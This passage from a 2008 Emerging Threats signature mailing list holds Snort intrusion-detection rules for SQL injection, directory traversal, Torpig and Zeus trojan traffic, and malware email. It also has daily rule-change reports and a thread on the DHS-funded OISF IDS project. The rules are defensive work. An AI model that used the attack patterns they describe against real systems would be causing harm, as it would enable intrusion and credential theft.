sid:2008646; rev:1;) > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN > SQLix SQL Injection Vector Scan"; flow:established,to_server; content:"GET "; > depth:4; content:"myVAR=1234"; content:"Windows 98"; offset:36; within:120; > classtype:attempted-recon; > reference:url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project; > sid:2008654; rev:1;) > > > > jp > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From dokas at oitsec.umn.edu Mon Oct 13 12:38:05 2008 From: dokas at oitsec.umn.edu (Paul Dokas) Date: Mon, 13 Oct 2008 11:38:05 -0500 Subject: [Emerging-Sigs] Torpig In-Reply-To: <48F37767.6010007@jonkmans.com> References: <48EB6B30.1010204@oitsec.umn.edu> <48F37767.6010007@jonkmans.com> Message-ID: <48F3796D.4060707@oitsec.umn.edu> Matt Jonkman wrote: > Posted this: > #by Paul Dokas > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN > Torpig Infection Reporting"; flow:established,to_server; content:"POST > "; depth:5; content:"HTTP/1.0|0d 0a|"; content:!"|0d 0a|User-Agent\: "; > content:"|0d 0a|Content-Length\: 0|0d 0a|"; content:"|0d 0a|Connection\: > close|0d 0a|"; classtype:trojan-activity; sid:2008660; rev:1;) > > Added a few |0d 0a|'s to make the string larger is all. > > Good this way? This looks good. And I can only take some of the credit for creating this rule. Others here in my group helped in it's creation. I'll let them step forward if they'd like the recognition. Paul -- Paul Dokas dokas at oitsec.umn.edu ====================================================================== Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla." From emerging at emergingthreats.net Mon Oct 13 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Mon, 13 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081013200008.DC23445026@goliath.jonkmans.com> [***] Results from Oinkmaster started Mon Oct 13 16:00:08 2008 [***] [+++] Added rules: [+++] 2008659 - ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) (emerging-malware.rules) 2008660 - ET TROJAN Torpig Infection Reporting (emerging-virus.rules) [///] Modified active rules: [///] 2008549 - ET MALWARE Systemdoctor.com/Antivir2008 related Fake Anti-Virus User-Agent (AntivirXP) (emerging-malware.rules) 2008646 - ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC (emerging.rules) 2008654 - ET SCAN SQLix SQL Injection Vector Scan (emerging-scan.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (3): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project 2008659 || ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) 2008660 || ET TROJAN Torpig Infection Reporting -> Added to emerging-sid-msg.map.txt (3): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category\:OWASP_SQLiX_Project 2008659 || ET MALWARE Suspicious User-Agent Detected (DigitAl56K/6.3) 2008660 || ET TROJAN Torpig Infection Reporting -> Added to emerging-virus.rules (1): #by Paul Dokas [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (7): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category:OWASP_SQLiX_Project 2500062 || ET COMPROMISED Known Compromised or Hostile Host Traffic (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500063 || ET COMPROMISED Known Compromised or Hostile Host Traffic (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500064 || ET COMPROMISED Known Compromised or Hostile Host Traffic (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510062 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510063 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510064 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (7): 2008654 || ET SCAN SQLix SQL Injection Vector Scan || url,www.owasp.org/index.php/Category:OWASP_SQLiX_Project 2500062 || ET COMPROMISED Known Compromised or Hostile Host Traffic (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500063 || ET COMPROMISED Known Compromised or Hostile Host Traffic (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500064 || ET COMPROMISED Known Compromised or Hostile Host Traffic (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510062 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (63) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510063 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (64) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510064 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (65) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Tue Oct 14 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Tue, 14 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081014200008.CB85345026@goliath.jonkmans.com> [***] Results from Oinkmaster started Tue Oct 14 16:00:08 2008 [***] [+++] Added rules: [+++] 2008661 - ET TROJAN Zbot/Zeus HTTP POST (emerging-virus.rules) 2008662 - ET TROJAN Generic PSW Agent server reply (emerging-virus.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2008661 || ET TROJAN Zbot/Zeus HTTP POST 2008662 || ET TROJAN Generic PSW Agent server reply -> Added to emerging-sid-msg.map.txt (2): 2008661 || ET TROJAN Zbot/Zeus HTTP POST 2008662 || ET TROJAN Generic PSW Agent server reply -> Added to emerging-virus.rules (2): # ref: 5742862edc6fddd3f51bf9d07c8d7aba # ref: 940fc0b0d523be104a96b09871e42b1e [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From signatures at stillsecure.com Wed Oct 15 08:17:47 2008 From: signatures at stillsecure.com (signatures) Date: Wed, 15 Oct 2008 06:17:47 -0600 Subject: [Emerging-Sigs] StillSecure: 5 New Signatures - Oct-15-2008 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2908@webmail.latis.com> Hi Matt, Please find 5 New Signatures below: 1. My PHP Indexer d File Disclosure alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"My PHP Indexer d File Disclosure"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?d="; nocase; pcre:"/((\.\.\/){1,}|(%2e%2e%2f){1,})/"; classtype:web-application-attack;reference:url,secunia.com/Advisories/32215/; reference:url,www.milw0rm.com/exploits/6740; sid:8457; rev:1;) 2. Real Estates Classifieds cat SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Real Estates Classifieds cat SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?cat="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack;reference:url,secunia.com/Advisories/32223/; reference:url,www.milw0rm.com/exploits/6736; sid:8458; rev:1;) 3. Joomla Ignite Gallery Component gallery SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla Ignite Gallery Component gallery SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?option=com_ignitegallery&task=view"; nocase; uricontent:"&gallery="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32240/; reference:url,www.milw0rm.com/exploits/6723; sid:8459; rev:1;) 4. Joomla Mad4Joomla Mailforms Component jid SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Joomla Mad4Joomla Mailforms Component jid SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?option=com_mad4joomla"; nocase; uricontent:"&jid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32239/; reference:url,www.milw0rm.com/exploits/6724; sid:8460; rev:1;) 5. IndexScript parent_id SQL Injection alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"IndexScript parent_id SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/sug_cat.php?parent_id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32173/; reference:url,www.milw0rm.com/exploits/6746; sid:8461; rev:1;) Looking forward for your comments if any... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081015/62d4f0d1/attachment.html From emerging at emergingthreats.net Wed Oct 15 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Wed, 15 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081015200008.59F7445026@goliath.jonkmans.com> [***] Results from Oinkmaster started Wed Oct 15 16:00:08 2008 [***] [+++] Added rules: [+++] 2008663 - ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) (emerging-malware.rules) 2008664 - ET TROJAN Generic Dropper HTTP Bot grabbing config (emerging-virus.rules) 2008665 - ET TROJAN Obfiscator.vc or Related Infection Checkin (emerging-virus.rules) 2008666 - ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) (emerging-virus.rules) [///] Modified active rules: [///] 2008640 - ET SCAN SIP erase_registrations/add registrations attempt (emerging-voip.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (4): 2008663 || ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) 2008664 || ET TROJAN Generic Dropper HTTP Bot grabbing config 2008665 || ET TROJAN Obfiscator.vc or Related Infection Checkin 2008666 || ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) -> Added to emerging-sid-msg.map.txt (4): 2008663 || ET MALWARE Suspicious User-Agent Detected (aguarovex-loader v3.221) 2008664 || ET TROJAN Generic Dropper HTTP Bot grabbing config 2008665 || ET TROJAN Obfiscator.vc or Related Infection Checkin 2008666 || ET TROJAN Delf Key Checkin (Clicker.Win32.Delf.afl) -> Added to emerging-virus.rules (2): # ref: c2a3a87735f8c5e11de82c52c94aefc7 #re 7a60eada62a331c793ba066e43bfc4f2 From jonkman at jonkmans.com Thu Oct 16 10:40:12 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 16 Oct 2008 10:40:12 -0400 Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS Message-ID: <48F7524C.7040106@jonkmans.com> October 16, 2008 (LAFAYETTE, Ind.) ? The Open Information Security Foundation (OISF, www.openinfosecfoundation.org) is proud to announce its formation, made possible by a grant from the U.S. Department of Homeland Security (DHS). The OISF has been chartered and funded by DHS to build a next-generation intrusion detection and prevention engine. This project will consider every new and existing technology, concept and idea to build a completely open source licensed engine. Development will be funded by DHS, and the end product will be made available to any user or organization. This is an unprecedented opportunity for the security community. DHS has recognized that many parallel technologies in the marketplace could greatly enhance the overall security of government agencies and the Internet as a whole. This grant will allow us to work as a community to tie these technologies together. Over the next six months, members of OISF will be leading brainstorming sessions at key conferences and meetings as well as through mailing list discussions. These sessions will function as open forums to bring up ideas, ask questions and, most of all, let OISF know what YOU need for YOUR network. Any idea, any technology ? anything ? will be considered for integration. This project will solicit input, code and support from all interested parties, academic groups, vendors and projects. Any vendor, group, academic institution, government agency or individual may be part of the consortium that will manage this project long-term. Members may support development and maintenance with financial donations, coding support, technology support, infrastructure, etc. Members will be rewarded with licensing that will allow integration of this engine into their products and services. Initial project members are Matt Jonkman of Emerging Threats as Project Manager (http://www.emergingthreats.net), Victor Julien (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical Leads. If you have ideas to contribute please join our discussion mailing list: http://lists.openinfosecfoundation.org/mailman/listinfo/discussion or join oisf-announce to stay in touch: http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Thu Oct 16 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Thu, 16 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081016200008.87DE745026@goliath.jonkmans.com> [***] Results from Oinkmaster started Thu Oct 16 16:00:08 2008 [***] [*] Rules modifications: [*] None. [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (2): 2500061 || ET COMPROMISED Known Compromised or Hostile Host Traffic (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510061 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (62) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From jim.mcquaid at gmail.com Thu Oct 16 19:38:55 2008 From: jim.mcquaid at gmail.com (James McQuaid) Date: Thu, 16 Oct 2008 19:38:55 -0400 Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS Message-ID: Congratulations Matt! This is terrific news for everyone :) James > Message: > Date: Thu, 16 Oct 2008 10:40:12 -0400 > From: Matt Jonkman > Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation > IDS/IPS > To: announce at emergingthreats.net > Message-ID: <48F7524C.7040106 at jonkmans.com> > Content-Type: text/plain; charset=windows-1252 > > October 16, 2008 (LAFAYETTE, Ind.) ? The Open Information Security > Foundation (OISF, www.openinfosecfoundation.org) is proud to announce > its formation, made possible by a grant from the U.S. Department of > Homeland Security (DHS). The OISF has been chartered and funded by DHS > to build a next-generation intrusion detection and prevention engine. > This project will consider every new and existing technology, concept > and idea to build a completely open source licensed engine. Development > will be funded by DHS, and the end product will be made available to any > user or organization. > > This is an unprecedented opportunity for the security community. DHS has > recognized that many parallel technologies in the marketplace could > greatly enhance the overall security of government agencies and the > Internet as a whole. This grant will allow us to work as a community to > tie these technologies together. > > Over the next six months, members of OISF will be leading brainstorming > sessions at key conferences and meetings as well as through mailing list > discussions. These sessions will function as open forums to bring up > ideas, ask questions and, most of all, let OISF know what YOU need for > YOUR network. Any idea, any technology ? anything ? will be considered > for integration. This project will solicit input, code and support from > all interested parties, academic groups, vendors and projects. > > Any vendor, group, academic institution, government agency or individual > may be part of the consortium that will manage this project long-term. > Members may support development and maintenance with financial > donations, coding support, technology support, infrastructure, etc. > Members will be rewarded with licensing that will allow integration of > this engine into their products and services. > > Initial project members are Matt Jonkman of Emerging Threats as Project > Manager (http://www.emergingthreats.net), Victor Julien > (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) > both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical > Leads. > > If you have ideas to contribute please join our discussion mailing list: > http://lists.openinfosecfoundation.org/mailman/listinfo/discussion > > or join oisf-announce to stay in touch: > http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce > > > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > > > > ------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > > End of Emerging-sigs Digest, Vol 11, Issue 20 > ********************************************* > -- James McQuaid http://www.jamesmcquaid.com From randy at procyonlabs.com Thu Oct 16 20:52:04 2008 From: randy at procyonlabs.com (Randal T. Rioux) Date: Thu, 16 Oct 2008 20:52:04 -0400 (EDT) Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS Message-ID: <369a4e0cedd3f6da640430da11f2f93d.squirrel@meteor.procyonlabs.com> I'd say congratulations if I wasn't so concerned. Why is this effort being started? Is there a problem with the current open source solution(s)? What, specifically, would be different? DHS is known for pissing large quantities of taxpayer money away. I'd just like some justifications and specifics if possible. Thanks, A Cranky and Concerned Citizen On Thu, October 16, 2008 10:40 am, Matt Jonkman wrote: > October 16, 2008 (LAFAYETTE, Ind.) ? The Open Information Security > Foundation (OISF, www.openinfosecfoundation.org) is proud to announce its > formation, made possible by a grant from the U.S. Department of Homeland > Security (DHS). The OISF has been chartered and funded by DHS to build a > next-generation intrusion detection and prevention engine. This project > will consider every new and existing technology, concept and idea to > build a completely open source licensed engine. Development will be > funded by DHS, and the end product will be made available to any user or > organization. > > This is an unprecedented opportunity for the security community. DHS has > recognized that many parallel technologies in the marketplace could > greatly enhance the overall security of government agencies and the > Internet as a whole. This grant will allow us to work as a community to > tie these technologies together. > > Over the next six months, members of OISF will be leading brainstorming > sessions at key conferences and meetings as well as through mailing list > discussions. These sessions will function as open forums to bring up > ideas, ask questions and, most of all, let OISF know what YOU need for > YOUR network. Any idea, any technology ? anything ? will be considered > for integration. This project will solicit input, code and support from > all interested parties, academic groups, vendors and projects. > > Any vendor, group, academic institution, government agency or individual > may be part of the consortium that will manage this project long-term. > Members may support development and maintenance with financial donations, > coding support, technology support, infrastructure, etc. Members will be > rewarded with licensing that will allow integration of this engine into > their products and services. > > Initial project members are Matt Jonkman of Emerging Threats as Project > Manager (http://www.emergingthreats.net), Victor Julien > (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) > both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical > Leads. > > If you have ideas to contribute please join our discussion mailing list: > http://lists.openinfosecfoundation.org/mailman/listinfo/discussion > > or join oisf-announce to stay in touch: > http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce From jonkman at jonkmans.com Thu Oct 16 21:07:43 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 16 Oct 2008 21:07:43 -0400 Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS In-Reply-To: <369a4e0cedd3f6da640430da11f2f93d.squirrel@meteor.procyonlabs.com> References: <369a4e0cedd3f6da640430da11f2f93d.squirrel@meteor.procyonlabs.com> Message-ID: <48F7E55F.6010504@jonkmans.com> Randal T. Rioux wrote: > I'd say congratulations if I wasn't so concerned. Why is this effort being > started? Is there a problem with the current open source solution(s)? No, this project isn't about fixing what exists. It's about the next step, and there's really no commercially viable way for any vendor to invest what's required and take this risk to make that next big step. There's money in making the existing go faster, but there's not an immediate market for do this plus these other things. > > What, specifically, would be different? DHS is known for pissing large > quantities of taxpayer money away. I'd just like some justifications and > specifics if possible. Reasonable question. I've just sent some of my ideas to the oisf discussion list. There's a discussion starting there so I'll skip the details here. Hop on that list if you're more interested, but I'll summarize here: We have more data than we can use at the moment. I would like to see IP reputation support that can be shared amongst sensors. Snortsam on massive steroids. That'd let us take intelligence feeds fro our peers as well as our security vendors. Many cmopanies (and projects like ET) have huge warehouses of information about IPs, domains, malware, exe's etc. But we have no real way to use this data in realtime. Multithreading is something we have to get better at. And hardware acceleration, we need to do that natively, and not just for one platform. There are many ways to accelerate, and many ways we can't accelerate because we can't rewrite. This project will take all possible into consideration at design time and hopefully support as many as feasible out of the box. last thing, scoring by hits. As spamassasin does to make a decision about an email, I'd like to be able to make that decision about an IP. If they do a bunch of things that are a little abd I want the ability to block them realtime, automated. But anyway, if you want more info on what/how/why the OISF list will be best to get that discussion. Your question is good, I've seen tons of wasted money on very bad things. I don't believe this is one of them. And we're not talking millions here. We're going to rely on donations, the community, and volunteers far more than our funding, but this is VERY doable. Matt > > Thanks, > > A Cranky and Concerned Citizen > > > On Thu, October 16, 2008 10:40 am, Matt Jonkman wrote: >> October 16, 2008 (LAFAYETTE, Ind.) ? The Open Information Security >> Foundation (OISF, www.openinfosecfoundation.org) is proud to announce its >> formation, made possible by a grant from the U.S. Department of Homeland >> Security (DHS). The OISF has been chartered and funded by DHS to build a >> next-generation intrusion detection and prevention engine. This project >> will consider every new and existing technology, concept and idea to >> build a completely open source licensed engine. Development will be >> funded by DHS, and the end product will be made available to any user or >> organization. >> >> This is an unprecedented opportunity for the security community. DHS has >> recognized that many parallel technologies in the marketplace could >> greatly enhance the overall security of government agencies and the >> Internet as a whole. This grant will allow us to work as a community to >> tie these technologies together. >> >> Over the next six months, members of OISF will be leading brainstorming >> sessions at key conferences and meetings as well as through mailing list >> discussions. These sessions will function as open forums to bring up >> ideas, ask questions and, most of all, let OISF know what YOU need for >> YOUR network. Any idea, any technology ? anything ? will be considered >> for integration. This project will solicit input, code and support from >> all interested parties, academic groups, vendors and projects. >> >> Any vendor, group, academic institution, government agency or individual >> may be part of the consortium that will manage this project long-term. >> Members may support development and maintenance with financial donations, >> coding support, technology support, infrastructure, etc. Members will be >> rewarded with licensing that will allow integration of this engine into >> their products and services. >> >> Initial project members are Matt Jonkman of Emerging Threats as Project >> Manager (http://www.emergingthreats.net), Victor Julien >> (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) >> both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical >> Leads. >> >> If you have ideas to contribute please join our discussion mailing list: >> http://lists.openinfosecfoundation.org/mailman/listinfo/discussion >> >> or join oisf-announce to stay in touch: >> http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce > > > > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Thu Oct 16 21:12:12 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 16 Oct 2008 21:12:12 -0400 Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation IDS/IPS In-Reply-To: References: Message-ID: <48F7E66C.4010608@jonkmans.com> Thanks Jim, lest hope something good comes of it all! Matt James McQuaid wrote: > Congratulations Matt! > > This is terrific news for everyone :) > > James > > > >> Message: >> Date: Thu, 16 Oct 2008 10:40:12 -0400 >> From: Matt Jonkman >> Subject: [Emerging-Sigs] DHS to Fund Open Source Next Generation >> IDS/IPS >> To: announce at emergingthreats.net >> Message-ID: <48F7524C.7040106 at jonkmans.com> >> Content-Type: text/plain; charset=windows-1252 >> >> October 16, 2008 (LAFAYETTE, Ind.) ? The Open Information Security >> Foundation (OISF, www.openinfosecfoundation.org) is proud to announce >> its formation, made possible by a grant from the U.S. Department of >> Homeland Security (DHS). The OISF has been chartered and funded by DHS >> to build a next-generation intrusion detection and prevention engine. >> This project will consider every new and existing technology, concept >> and idea to build a completely open source licensed engine. Development >> will be funded by DHS, and the end product will be made available to any >> user or organization. >> >> This is an unprecedented opportunity for the security community. DHS has >> recognized that many parallel technologies in the marketplace could >> greatly enhance the overall security of government agencies and the >> Internet as a whole. This grant will allow us to work as a community to >> tie these technologies together. >> >> Over the next six months, members of OISF will be leading brainstorming >> sessions at key conferences and meetings as well as through mailing list >> discussions. These sessions will function as open forums to bring up >> ideas, ask questions and, most of all, let OISF know what YOU need for >> YOUR network. Any idea, any technology ? anything ? will be considered >> for integration. This project will solicit input, code and support from >> all interested parties, academic groups, vendors and projects. >> >> Any vendor, group, academic institution, government agency or individual >> may be part of the consortium that will manage this project long-term. >> Members may support development and maintenance with financial >> donations, coding support, technology support, infrastructure, etc. >> Members will be rewarded with licensing that will allow integration of >> this engine into their products and services. >> >> Initial project members are Matt Jonkman of Emerging Threats as Project >> Manager (http://www.emergingthreats.net), Victor Julien >> (http://www.inliniac.net) and Will Metcalf (http://node5.blogspot.com) >> both of Snort_Inline (http://snort-inline.sourceforge.net) as Technical >> Leads. >> >> If you have ideas to contribute please join our discussion mailing list: >> http://lists.openinfosecfoundation.org/mailman/listinfo/discussion >> >> or join oisf-announce to stay in touch: >> http://lists.openinfosecfoundation.org/mailman/listinfo/oisf-announce >> >> >> >> -- >> -------------------------------------------- >> Matthew Jonkman >> Emerging Threats >> Phone 765-429-0398 >> Fax 312-264-0205 >> http://www.emergingthreats.net >> -------------------------------------------- >> >> PGP: http://www.jonkmans.com/mattjonkman.asc >> >> >> >> >> >> ------------------------------ >> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> >> >> End of Emerging-sigs Digest, Vol 11, Issue 20 >> ********************************************* >> > > > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From chris.a.libby at gmail.com Fri Oct 17 09:03:54 2008 From: chris.a.libby at gmail.com (Chris Libby) Date: Fri, 17 Oct 2008 09:03:54 -0400 Subject: [Emerging-Sigs] Empty destination IP in 2404020 Message-ID: Looks like 2404020 has an empty DstIP: alert ip $HOME_NET any -> [] any (msg:"ET DROP Known Bot C&C Server Traffic (group 21)"; threshold: type limit, track by_src, seconds 3600, count 1; classtype:trojan-activity; sid:2404020; rev:1320; reference:url,www.shadowserver.org;) TIA - Chris From jonkman at jonkmans.com Fri Oct 17 09:06:14 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 17 Oct 2008 09:06:14 -0400 Subject: [Emerging-Sigs] Empty destination IP in 2404020 In-Reply-To: References: Message-ID: <48F88DC6.5090706@jonkmans.com> Fixed up! Thanks Chris Libby wrote: > Looks like 2404020 has an empty DstIP: > > alert ip $HOME_NET any -> [] any (msg:"ET DROP Known Bot C&C Server Traffic > (group 21)"; threshold: type limit, track by_src, seconds 3600, count 1; > classtype:trojan-activity; sid:2404020; rev:1320; > reference:url,www.shadowserver.org;) > > TIA - Chris > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From veerendragg at secpod.com Fri Oct 17 09:40:08 2008 From: veerendragg at secpod.com (Veerendra GG) Date: Fri, 17 Oct 2008 19:10:08 +0530 Subject: [Emerging-Sigs] Signatures on Malware E-mail and XSS Attacks Message-ID: <48F895B8.1020706@secpod.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 # 14/10/2008 Microsoft PicturePusher XSS alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Microsoft PicturePusher ActiveX Cross Site File Upload Attack"; content:"clsid"; nocase; content:"507813C3-0B26-47AD-A8C0-D483C7A21FA7"; nocase; pcre:"/http\://.*?[\w]{4,}=1/i"; nocase; pcre:"/(PostURL|AddSeperator|AddString|Post)/i"; nocase; reference:url,milw0rm.com/exploits/6699; classtype:web-application-attack; sid:9031; rev:1;) # 16/10/2008 eCard Email Malware Attack alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"eCard email malware attack - Trojan"; flow:established,to_server; content:"|0d 0a|Subject\: You have received an eCard"; nocase; content:"e-card.zip"; nocase; classtype:trojan-activity; reference:url,www.sophos.com/blogs/gc/g/2008/10/15/you-have-not-received-an-ecard/; sid:9032; rev:1;) - -- regards, Veerendra GG www.secpod.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSPiVuOEQO76B7pCmAQJy9Q/+K151GWG+1+sXC2imIEpNwPyTQVZiJ5Uz YWsTWtp+JCiyf54P8mjWCoiJbCg2bXLj1tEALshvkxaHF/Tp48Jmj4p/J4EW2Mms kyawyskIw92U6QzWTkVoyYtiyqKNS/1T4pZFL8hW6hoit2wCoIfwGf6XYYA48ypi 3vSu1eBmJsW3QufQDGRY9wdQZaM49YnuTzoEkNRRFpDw3rgC7KbRUSxL+CsbWxt5 gYkc1xvop+dpkeehbKJX2Eyb9v7ceWSKnRsF98NApC6Q3qiziOHrtgT1BriEWWlI zXaf/ynAuVRXyFivTd7xa5pQw3fPVBmrwvJBIcUhcDsBND2/EZnT13j+7bBjBQpg lQS1xWzyNVZUUB9wQYt50NetqHPIzqZWpaRrAFxHdMAfyJcHfrA0AYAfqD6E1Cp5 